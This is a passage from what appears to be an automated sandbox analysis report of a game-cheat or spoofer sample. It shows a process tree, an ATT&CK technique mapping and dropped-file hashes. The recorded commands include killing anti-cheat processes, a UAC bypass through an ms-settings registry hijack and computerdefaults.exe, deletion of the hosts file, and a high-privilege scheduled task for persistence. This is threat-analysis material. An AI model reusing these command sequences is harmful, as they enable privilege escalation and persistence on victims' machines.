- Suspicious use of WriteProcessMemory
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:104

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_BE.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\taskkill.exe
taskkill /f /im OneDrive.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEservice.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\system32\taskkill.exe
taskkill /f /im BEservice.exe
4⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Temp\Runtime.exe /ID /SP /SS /SU /SK /BM /BP /BV /BS /CS /CSK /PSN /PPN AUTO >NUL
3⤵
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\Temp\Runtime.exe
C:\Windows\Temp\Runtime.exe /ID /SP /SS /SU /SK /BM /BP /BV /BS /CS /CSK /PSN /PPN AUTO
4⤵
- Cerber
- Executes dropped EXE
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Windows\Temp\AMIDEWIN64.exe >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:4540

C:\Windows\Temp\AMIDEWIN64.exe
C:\Windows\Temp\AMIDEWIN64.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\halfhalf27041967.vbs" /f
5⤵
- Modifies registry class
PID:940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
5⤵
- Modifies registry class
PID:2456

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
5⤵
PID:708

C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
6⤵
PID:2000

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\halfhalf27041967.vbs
7⤵
PID:1540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
8⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN UpdateFirefoxComponents_FaI1OzZvT154JebGb18F040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\FaI1OzZvT154JebGb18F040MX.exe" /RL HIGHEST /IT
5⤵
PID:3024

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN UpdateFirefoxComponents_FaI1OzZvT154JebGb18F040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\FaI1OzZvT154JebGb18F040MX.exe" /RL HIGHEST /IT
6⤵
- Creates scheduled task(s)
PID:900

C:\Users\Admin\AppData\Local\Temp\l3ks5em1.exe
"C:\Users\Admin\AppData\Local\Temp\l3ks5em1.exe" explorer.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Users\Admin\AppData\Local\Temp\chromedriver-win64\chromedriver.exe
"C:\Users\Admin\AppData\Local\Temp\chromedriver-win64\chromedriver.exe" --port=50016
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --window-position=-32000,-32000 data:,
6⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Windows\SystemTemp\scoped_dir4448_1736178681 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\scoped_dir4448_1736178681\Crashpad --metrics-dir=C:\Windows\SystemTemp\scoped_dir4448_1736178681 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc3d029758,0x7ffc3d029768,0x7ffc3d029778
7⤵
- Drops file in Windows directory
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --enable-logging --log-level=0 --mojo-platform-channel-handle=1956 --field-trial-handle=1892,i,6161755921683126564,11527860339751484686,131072 /prefetch:8
7⤵
- Drops file in Windows directory
PID:3804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --display-capture-permissions-policy-allowed --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1892,i,6161755921683126564,11527860339751484686,131072 /prefetch:1
7⤵
- Drops file in Program Files directory
PID:1288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --display-capture-permissions-policy-allowed --first-renderer-process --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1892,i,6161755921683126564,11527860339751484686,131072 /prefetch:1
7⤵
- Drops file in Program Files directory
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --enable-logging --log-level=0 --mojo-platform-channel-handle=2232 --field-trial-handle=1892,i,6161755921683126564,11527860339751484686,131072 /prefetch:8
7⤵
- Drops file in Program Files directory
PID:2104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4448_1736178681" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --enable-logging --log-level=0 --mojo-platform-channel-handle=1596 --field-trial-handle=1892,i,6161755921683126564,11527860339751484686,131072 /prefetch:2
7⤵
- Drops file in Program Files directory
PID:2180

C:\Users\Admin\AppData\Local\Temp\msedgedriver.exe
"C:\Users\Admin\AppData\Local\Temp\msedgedriver.exe" --port=50181
5⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in Windows directory
PID:2572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --window-position=-32000,-32000 data:,
6⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Windows\SystemTemp\scoped_dir2572_1029341843 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\scoped_dir2572_1029341843\Crashpad --metrics-dir=C:\Windows\SystemTemp\scoped_dir2572_1029341843 --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc41f13cb8,0x7ffc41f13cc8,0x7ffc41f13cd8
7⤵
- Drops file in Windows directory
PID:2796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,8574487366577509172,8101773024707877227,131072 --lang=en-US --service-sandbox-type=none --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --enable-logging --log-level=0 --mojo-platform-channel-handle=2064 /prefetch:3
7⤵
PID:3520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,8574487366577509172,8101773024707877227,131072 --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --enable-logging --log-level=0 --mojo-platform-channel-handle=2004 /prefetch:2
7⤵
PID:3728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,8574487366577509172,8101773024707877227,131072 --lang=en-US --service-sandbox-type=utility --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --enable-logging --log-level=0 --mojo-platform-channel-handle=2668 /prefetch:8
7⤵
- Drops file in Windows directory
PID:3372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --field-trial-handle=1992,8574487366577509172,8101773024707877227,131072 --lang=en-US --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
7⤵
PID:4964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --field-trial-handle=1992,8574487366577509172,8101773024707877227,131072 --lang=en-US --user-data-dir="C:\Windows\SystemTemp\scoped_dir2572_1029341843" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
7⤵
PID:2072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\Runtime.exe >nul
3⤵
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\AMIFLDRV64.sys >nul
3⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WmiPrvSE.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3348

C:\Windows\system32\taskkill.exe
taskkill /f /im WmiPrvSE.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Windows\SMBIOSRuntime.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/soarcheats
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc41f13cb8,0x7ffc41f13cc8,0x7ffc41f13cd8
3⤵
PID:980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
3⤵
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
3⤵
PID:388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
3⤵
PID:3452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
3⤵
PID:3328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
3⤵
PID:2628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
3⤵
PID:1220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
3⤵
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
3⤵
PID:1956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
3⤵
PID:2424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
3⤵
PID:4360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4708 /prefetch:8
3⤵
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7160 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4484

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7396 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
3⤵
PID:952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
3⤵
PID:3780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
3⤵
PID:484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
3⤵
PID:1116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,2615591383531738131,15738368246964139834,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4368 /prefetch:2
3⤵
PID:5276

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3280

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
1⤵
- Runs ping.exe
PID:4228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4484

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5000

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004B4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3636

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5144

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4aa37444d26e81e6f3837eb15bcaa892

SHA1
3d00127097989429f311f33daa8380ad7af4cb56

SHA256
ab703e5dfb5b92527f094fad6ec479839375907700be9a2fd1c3cb9105f9e655

SHA512
f21a34c234433a688602b2b56d6844f224641bea45b8585f77f4853e192107a65c5e104e10cd86c1d97ff41a22fd05d65224993803b22113ed0b517e686c5176

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
Filesize
250KB

MD5
5a33213da47f37967fa8c6bcaebe358e

SHA1
71cd5fb4e07c57f2d4ae229053300f2a786db04b

SHA256
0d5a45aaf5293fd682effa627f31ebefe532a076025949cdb231dabdf39136fa

SHA512
4b1dc7da55322e667f647c37617222f72176f2af26c3e7149ed8f99f1d9b270d7902ea7f02964951b4c88061ac5bfb17e8a05ed79e210282019907b71aa2c053

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
456B

MD5
7392bd46e94b5f3be1c6ac4c4b355525

SHA1
7cf91440c6fea507dde725b8a44a8ed62efb303c

SHA256
56c9b3cb96993a9be51b316a71e50a22301520b8be5002c99bd40138b78e3c82

SHA512
b926b27233af61e12d13366cc5eb6991cad57c4a5386de283972f950d409e007e16dacf0088bcd352ad3041fefac8d70ab86dc862d0691fe7953823783443668

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b
